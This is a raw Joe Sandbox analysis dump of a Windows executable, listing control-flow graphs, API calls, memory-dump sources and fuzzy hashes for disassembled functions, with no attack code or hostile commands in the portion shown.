                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??2@$H_prolog
                                              • String ID: HIA
                                              • API String ID: 3431946709-2712174624
                                              • Opcode ID: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                              • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                              • Opcode Fuzzy Hash: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                              • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1236 402844-40288e call 411c20 call 40dcfb lstrlenA * 2 1240 402893-4028af call 40dcc7 1236->1240 1242 4028b5-4028ba 1240->1242 1243 40297f 1240->1243 1242->1243 1244 4028c0-4028ca 1242->1244 1245 402981-402985 1243->1245 1246 4028cd-4028d2 1244->1246 1247 402911-402916 1246->1247 1248 4028d4-4028d9 1246->1248 1249 40293b-40295f memmove 1247->1249 1251 402918-40292b memcmp 1247->1251 1248->1249 1250 4028db-4028ee memcmp 1248->1250 1256 402961-402968 1249->1256 1257 40296e-402979 1249->1257 1252 4028f4-4028fe 1250->1252 1253 40297b-40297d 1250->1253 1254 40290b-40290f 1251->1254 1255 40292d-402939 1251->1255 1252->1243 1258 402900-402906 call 402640 1252->1258 1253->1245 1254->1246 1255->1246 1256->1257 1259 402890 1256->1259 1257->1245 1258->1254 1259->1240
                                              APIs
                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                              • memcmp.MSVCRT(?,?,?), ref: 004028E4
                                              • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                              • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: lstrlenmemcmp$memmove
                                              • String ID:
                                              • API String ID: 3251180759-0
                                              • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                              • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                              • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                              • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1263 40150b-401561 call 408726 call 401329 call 401429 CreateThread 1270 401563 call 40786b 1263->1270 1271 401568-401583 WaitForSingleObject 1263->1271 1270->1271 1273 401585-401588 1271->1273 1274 4015b7-4015bd 1271->1274 1277 40158a-40158d 1273->1277 1278 4015ab 1273->1278 1275 40161b 1274->1275 1276 4015bf-4015d4 GetExitCodeThread 1274->1276 1280 401620-401623 1275->1280 1281 4015d6-4015d8 1276->1281 1282 4015de-4015e9 1276->1282 1283 4015a7-4015a9 1277->1283 1284 40158f-401592 1277->1284 1279 4015ad-4015b5 call 407776 1278->1279 1279->1275 1281->1282 1286 4015da-4015dc 1281->1286 1287 4015f1-4015fa 1282->1287 1288 4015eb-4015ec 1282->1288 1283->1279 1289 4015a3-4015a5 1284->1289 1290 401594-401597 1284->1290 1286->1280 1293 401605-401611 SetLastError 1287->1293 1294 4015fc-401603 1287->1294 1292 4015ee-4015ef 1288->1292 1289->1279 1295 401599-40159c 1290->1295 1296 40159e-4015a1 1290->1296 1297 401613-401618 call 407776 1292->1297 1293->1297 1294->1275 1294->1293 1295->1275 1295->1296 1296->1292 1297->1275
                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                                              • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                                • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                              • String ID:
                                              • API String ID: 359084233-0
                                              • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                              • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                              • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                              • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1300 401986-401995 CreateDirectoryW 1301 4019c7-4019cb 1300->1301 1302 401997-4019a4 GetLastError 1300->1302 1303 4019b1-4019be GetFileAttributesW 1302->1303 1304 4019a6 1302->1304 1303->1301 1306 4019c0-4019c2 1303->1306 1305 4019a7-4019b0 SetLastError 1304->1305 1306->1301 1307 4019c4-4019c5 1306->1307 1307->1305
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                              • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                              • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ErrorLast$AttributesCreateDirectoryFile
                                              • String ID:
                                              • API String ID: 635176117-0
                                              • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                              • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                              • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                              • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1308 404a44-404a62 call 408676 ??2@YAPAXI@Z 1311 404a64-404a6b call 40a9f8 1308->1311 1312 404a6d 1308->1312 1314 404a6f-404a91 call 408726 call 40dcfb 1311->1314 1312->1314 1341 404a92 call 40b2fc 1314->1341 1342 404a92 call 40a7de 1314->1342 1319 404a95-404a97 1320 404ab3-404abd 1319->1320 1321 404a99-404aa9 call 407776 1319->1321 1323 404ada-404ae4 ??2@YAPAXI@Z 1320->1323 1324 404abf-404ac1 call 403354 1320->1324 1337 404aae-404ab2 1321->1337 1325 404ae6-404aed call 404292 1323->1325 1326 404aef 1323->1326 1331 404ac6-404ac9 1324->1331 1330 404af1-404af6 call 40150b 1325->1330 1326->1330 1336 404afb-404afd 1330->1336 1331->1323 1335 404acb 1331->1335 1338 404ad0-404ad8 1335->1338 1336->1338 1338->1337 1341->1319 1342->1319
                                              APIs
                                              • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000015,?,00405D20,?,00417788,00417788), ref: 00404A5A
                                              • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??2@
                                              • String ID: ExecuteFile
                                              • API String ID: 1033339047-323923146
                                              • Opcode ID: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                              • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                              • Opcode Fuzzy Hash: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                              • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1343 40adc3-40adce 1344 40add0-40add3 1343->1344 1345 40ae0d-40ae0f 1343->1345 1346 40add5-40ade3 ??2@YAPAXI@Z 1344->1346 1347 40adfb 1344->1347 1348 40adfd-40ae0c ??3@YAXPAX@Z 1346->1348 1349 40ade5-40ade7 1346->1349 1347->1348 1348->1345 1350 40ade9 1349->1350 1351 40adeb-40adf9 memmove 1349->1351 1350->1351 1351->1348
                                              APIs
                                              • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                              • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??2@??3@memmove
                                              • String ID:
                                              • API String ID: 3828600508-0
                                              • Opcode ID: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                              • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                              • Opcode Fuzzy Hash: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                              • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID: @
                                              • API String ID: 1890195054-2766056989
                                              • Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                              • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                                              • Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                              • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                                              APIs
                                                • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                                • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@$??2@ExceptionThrowmemmove
                                              • String ID:
                                              • API String ID: 4269121280-0
                                              • Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                              • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                                              • Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                              • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@H_prolog
                                              • String ID:
                                              • API String ID: 1329742358-0
                                              • Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                              • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                              • Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                              • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                              APIs
                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??2@??3@
                                              • String ID:
                                              • API String ID: 1936579350-0
                                              • Opcode ID: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                              • Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
                                              • Opcode Fuzzy Hash: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                              • Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
                                              APIs
                                              • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                              • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer
                                              • String ID:
                                              • API String ID: 2976181284-0
                                              • Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                              • Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
                                              • Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                              • Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64
                                              APIs
                                              • SysAllocString.OLEAUT32(?), ref: 0040ED05
                                              • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: AllocExceptionStringThrow
                                              • String ID:
                                              • API String ID: 3773818493-0
                                              • Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                              • Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
                                              • Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                              • Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3168844106-0
                                              • Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                              • Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
                                              • Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                              • Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                              • Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
                                              • Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                              • Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A
                                              APIs
                                              • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
